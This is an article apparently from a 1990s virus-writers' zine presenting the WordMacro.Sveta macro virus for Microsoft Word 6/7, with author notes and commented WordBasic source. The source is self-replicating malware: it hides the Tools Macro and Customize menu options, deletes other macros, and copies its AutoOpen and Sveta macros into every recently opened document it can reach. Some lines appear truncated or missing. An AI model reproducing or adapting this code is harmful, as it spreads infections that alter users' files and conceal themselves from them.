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SLAM4.045: WordMacro.Sveta by KidChaos/SLAM
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S WordMacro.Sveta S
| By |
M Kid Chaos [SLAM] M
| |
Name : WM.Sveta
Version : A
Language : WordBasic
Author : Kid Chaos [SLAM]
Target : M$-Word 6/7
Size : 897 bytes
Total macros : two
Stealth : Yes, direct action
Encrypt : Yes
Comment : Some weeks ago a girl ask me "why you dedicate viruses to
girls?". Well, the girl of this question was Svetlana T.
a girl from Russia who currently is resident in my country.
Well this wordmacro is my little answer for you Sveta :-D
Description : WordMacro.Sveta is a tiny macro, which dont need infect the
NORMAL.DOT because it use the FileList() command to infect
documents when a infected document is open, this sounds
suspicious a bit but this wordmacro is researched only for
educational purposes :)
WM.Sveta is able to remove ToolsMacro and ToolsCustomize
options of every version of Word (this work if the user dont
change the original ubication of this options). This is the
only way where the NORMAL.DOT is saved. Also remove foreign
macros from the global template.
Before to infect, WM.Sveta remove foreigns macros from the
documents of the FileList. Yep this wordmacro is a good
anti-macrovirus too :)
Macro name: Sveta
'===> Sveta by Kid Chaos [SLAM] <=== 'Copyright, i dunno if CARO
'----------> April 1998 <----------- 'read this :-D
End Sub
Sub Russiangirl
DisableAutoMacros 'Disable the AutoOpen macro
'which launch this macro
A$ = MenuText$(0, 6) 'The Tools Menu or the equ
'for your native version is
'the number six
'A$ is your Tools Menu
v = CountMenuItems(A$, 0, 1) 'Count items from A$
If (v > 14) Then 'I assume you have the ToolsMacro
'and ToolsCustomize options ables
'then i'm try to delete
ToolsOptionsSave .GlobalDotPrompt = 0 'Dont ask when the is
p = v - 1 'p=item position
j = p - 2 'j=new total items
While p > j
'Delete two options of Tools Menu
'you know what's :)
ToolsCustomizeMenus .MenuType = 0, .Position = p, \
.Name = MenuItemMacro$(A$, 0, p), .Menu = A$, .Remove, .Context = 0
p = p - 1
Wend 'End of While
End If
clean(0) 'now bcoz i'm a good boy :) i'm
'gonna clean your
'of foreigns macros.
a$ = FileName$() 'Get Filename from infected doc
For b = 1 To CountFiles() 'count recent opened files
If Files$(FileName$(b)) <> "" Then 'exist opened files?
FileList b 'yeah, then open!
c$ = FileName$() 'Get filename from future victim
If a$ <> c$ Then 'Of course, be sure the infected
'and the future victim isn't the
'same :)
If (GetDocumentVar$("Sveta") = "") Then 'The v-mark is Sveta, if i dont
'found nothing then infect!
clean(1) 'Firstly removes foreign macros
'from document
FileSaveAs .Format = 1 'Set template format
O$ = ":AutoOpen" 'Equates...equates :)
S$ = ":Sveta"
d$ = c$ + ":"
W$ = Str$(Rnd())
SetDocumentVar "SLAM", W$ 'Put my favorite VX Group ;)
MacroCopy a$ + O$, d$, 1 'Copy the first macros
MacroCopy a$ + S$, d$, 1 'Copy the second
SetDocumentVar "Sveta", W$ 'Set the v-mark
End If
FileClose 1 'Close whithout ask...
End If
End If
Next b
If Second(Now()) = 13 Then 'Put msg in the status bar
'if currently is 13 seconds
Print "----------======> SVETA by Kid Chaos [SLAM] <=======----------"
End If
DisableAutoMacros 0
End Sub
Sub clean(t) 'Routine for remove foreign
v = 3 'document by default
If t = 0 Then
ToolsOptionsSave .GlobalDotPrompt = 0
v = 0 'set to template
End If
If (CountMacros(t) > 0) Then
For I = CountMacros(t) To 1 Step - 1
ToolsMacro .Name = MacroName$(I, t), .Show = v, .Delete
End If
End Sub
Macro name: AutoOpen
On Error Goto cavs
ToolsMacro .Name = "Sveta", .Run 'launch Sveta macro
End Sub